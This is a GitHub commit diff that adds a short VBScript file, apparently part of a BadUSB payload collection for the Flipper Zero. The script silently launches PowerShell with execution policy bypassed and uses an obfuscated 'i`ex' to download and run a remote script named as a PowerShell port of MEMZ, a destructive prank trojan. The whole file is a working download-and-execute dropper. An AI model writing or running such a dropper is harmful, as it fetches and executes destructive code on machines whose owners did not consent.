Add files via upload

This commit is contained in:
egieb
2024-05-30 21:26:03 +00:00
committed by GitHub
parent 54f51e4994
commit d6babd423e

View File

@@ -0,0 +1,4 @@
Set WshShell = WScript.CreateObject("WScript.Shell")
WScript.Sleep 200
WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/MEMZ-In-Powershell/main.ps1 | i`ex", 0, True